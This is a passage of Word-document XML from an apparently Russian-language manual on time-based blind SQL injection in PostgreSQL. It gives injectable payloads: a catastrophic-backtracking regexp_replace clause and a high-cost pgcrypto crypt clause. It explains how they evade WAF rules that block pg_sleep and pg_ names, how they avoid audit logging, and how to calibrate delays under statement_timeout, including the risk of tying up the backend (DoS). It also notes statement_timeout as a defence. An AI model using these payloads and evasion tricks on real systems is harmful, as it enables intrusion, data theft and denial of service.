        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AND regexp_replace(repeat('a', 30), '(a+)+b', 'x') = repeat('a', 30)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(a+)+b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> против строки из 30 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — классический catastrophic-backtracking case (см. ReDoS). PG использует POSIX-regex-engine (с PG 15 — обновлён с GNU regex до Henry-Spencer-fork), оба уязвимы к catastrophic backtracking. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(a+)+b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на строке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">aaaaaa...a</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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в конце) — exponential time complexity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">N=30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → секунды; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">N=35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → минут; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">N=40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → часы. Точная калибровка зависит от version и optimization-level engine — нужно тестировать на target. Для CI-инстанса AWS r5.xlarge </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(a+)+b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на 28-30 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 2-5 секунд.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Опасность Payload C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в отличие от Payload A/B (где PG выполняет миллион итераций cheap-операций), Payload C может зависнуть на минуты или часы — что превращает oracle в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DoS-attack на бэкенд</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что соединение PG висит, threadpool/connection-pool забивается.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload D — pgcrypto.crypt с высоким cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если pgcrypto установлен (PUBLIC после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION pgcrypto</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id IS NOT NULL AND length(crypt('test', gen_salt('bf', 12))) &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crypt('test', gen_salt('bf', 12))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bcrypt hash с cost-factor 12 (=2^12=4096 раундов). Время — ~0.3 секунды на типичном железе; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">gen_salt('bf', 14)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ~1.2 секунды; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">gen_salt('bf', 15)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ~2.5 секунды. Calibratable, не зависит от количества данных, идёт через extension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий получает boolean oracle без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payload-тексте. Это критично, когда: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WAF блокирует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(включая case-варианты —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через 3.9.6 case-mix; и подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — через 3.9.5 hex-encoded).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Audit-логирование (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_min_duration_statement=N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) ловит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как маркер инъекции, но recursive CTE — реже.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Cloudflare/CDN-уровни блокируют «странные» query-string-длины (Payload A длиннее обычного, но recursive CTE — конструкция, которая встречается в reporting-API легитимно).</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`pg_sleep` отсутствует в payload-тексте.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Прямой regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bpg_sleep\s*\(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ничего не находит.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Recursive CTE — легитимная конструкция.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WAF не может её блокировать без false-positives (BOM, hierarchical data queries, graph traversal).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`generate_series` — built-in без `pg_`-префикса.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Не покрыта общим </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bpg_\w+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> фильтром (см. 3.9.0).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`regexp_replace` и `crypt` — стандартные функции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (regexp_replace — PG built-in; crypt — pgcrypto). Обе без подозрительной семантики в bytecode.</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Recursive CTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> документирован в §7.8.2; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH RECURSIVE r(c1, c2) AS (initial UNION ALL recursive_part) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Поддержка с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, стабильна.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Recursive CTE не блокирует tail-call optimization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PG материализует все итерации в worktable, потом читает. Память — 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`work_mem`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ограничивает sort/hash workspace, но не размер worktable recursive CTE. Большие N могут уйти на диск (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">temp_files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — увеличивает delay, но не падает.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`statement_timeout`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — главный защитник от Payload A/B/C/D. Если установлен в, например, 5 секунд, recursive с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">N=5M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3-4s) проходит, а с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">N=10M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (7-8s) — падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">canceling statement due to statement timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SQLSTATE 57014). Атакующий калибрует N под timeout (например, баинери-поиск: 5M проходит, 8M режется → N=5M).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`generate_series(int, int)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — устойчивая built-in, любой size; ограничена памятью (4 байта на int = 400 МБ для 100M значений с count-агрегацией; обычно в worker-памяти).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`regexp_replace` POSIX-regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Henry-Spencer engine (PG 15+) или предшественник; catastrophic-backtracking — известное поведение, не баг.</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8.4+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для recursive CTE; 9.x+ для current PG.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Recursive CTE и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доступны всем; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">regexp_replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — built-in; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crypt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gen_salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — требует extension pgcrypto (см. 3.8.4 для проверки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`statement_timeout`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: если установлен &lt; calibrated delay — payload падает; атакующий калибрует под лимит. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если не установлен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дефолт) — recursive CTE с большим N может продолжаться часами.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`work_mem`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`temp_file_limit`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> влияют на скорость, но не на принципиальную возможность.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 RDS / Cloud SQL / Supabase не блокируют CTE-recursion; statement_timeout у них обычно установлен в 30s–60s по дефолту, что даёт атакующему запас для калибровки.</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60" w:before="140"/>
      </w:pPr>
      <w:r>
